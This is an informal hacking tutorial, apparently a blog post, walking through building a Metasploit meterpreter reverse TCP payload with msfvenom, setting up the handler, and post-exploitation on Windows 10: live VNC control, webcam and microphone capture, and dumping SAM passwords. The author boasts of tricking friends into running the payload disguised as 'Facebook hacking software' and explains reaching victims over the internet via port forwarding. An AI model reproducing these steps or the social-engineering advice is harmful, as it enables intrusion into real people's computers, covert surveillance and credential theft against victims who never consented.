Steps and Instructions -
Today we will be hacking Windows 10 using Metasploit.
We will also do some basic post exploitation.
* Kali Linux
Some terms -
Payloads - Is a file used to make a reverse TCP connection to the target system.
Lets do it...
I am running two machines. One is Windows 10 and another is Kali Linux.
* First we will make a payload using msfvenom.
We will open a terminal and type in
"msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 exe LHOST=(your IP) LPORT=4444 -o /root/Desktop/monks.exe"
Here the -p for payload
--platform is windows
LHOST should be your IP address.
/root/Desktop is the path where the file is kept.
monks.exe is the name of the payload.
This will take some time to make the payload.
You can do this hack without the payload. But we will do that in the next tutorial. Note that payload is only used to make a reverse TCP connection.
When you hit enter, you will get an error as above snapshot saying "No encoder or badchars specified, outputting raw payload".
Thats totally fine until your payload has a size of 957487 bytes. Make sure that payload is not empty.
Your payload should be on the Desktop
Now is the time to launch Metasploit.
* Open a terminal and type "msfconsole". This will give us a console to set up our handler.
To set up we need to go through a series of commands
"set payload windows/meterpreter_reverse_tcp"
"set LHOST (your IP)"
"set LPORT 4444"
After the setup when we exploit, the process will be paused while it says "starting the payload handler"
Thats because the payload should be placed inside the target system and the target should double click on it.
Here you have to use your social engineering skills in order to place the payload inside the target system. Like I found this cool way where I uploaded the payload on MediaFire and told my friends that it is a Facebook hacking software. As expected they downloaded it and tried to run it.
It depends upon you how you make them execute it.
For now I will go to my windows 10 machine and double click on it
And when I come back to my Kali Machine
It says that we have an open session.
(Most people get stuck at "starting the payload handler...."
There are several reasons to get suck at this point. Stick to the end to read about troubleshooting)
OK. Now comes the post exploitation part.
We can run VNC to get live administration over the target.
* type "run vnc"
Just a tip guys. If you are running in VMware, dont do VNC. It will show you something like this
As you can see that it is totally fucked up.
Thats because it will show us the target machine which is physical and running a vmware machine. So its a mirror effect.
We can use commands like-
"getuid" for usernames
"sysinfo" for target specs
"run post/windows/gather/checkvm" to know if the target is real or virtual
"run post/windows/gather/enum_application" to see the running services in the target machine
Here is the list of programs running
We can look at the help menu by typing "help"
You will get lots of options. Like the one here with web cams
Here you can record mic, webcam chat, take snaps or stream it live.
You can dump the passwords from SAM database.
Lots of options for post exploitation.
I have done it on LAN. But if you wish to do it on WAN then you have to port forward your router and listen to that open port.
Troubleshoot it -
If your handler is on halt after "starting the payload handler....".
There can be many reasons. Like -
* The target has not clicked on the payload and ran it.
* If you are doing it on VMware where the payload doesn't work on few Operating systems.
I used have this same problem when I had VMware running on win 8. It didn't have VM0 adapter in Vmware function. That will not let you connect to a reverse tcp connection.
* When you are doing it on WAN. Its a complicated shit.
Thank you guys for reading this tutorial.
You may want to see my other tutorials on Metasploit-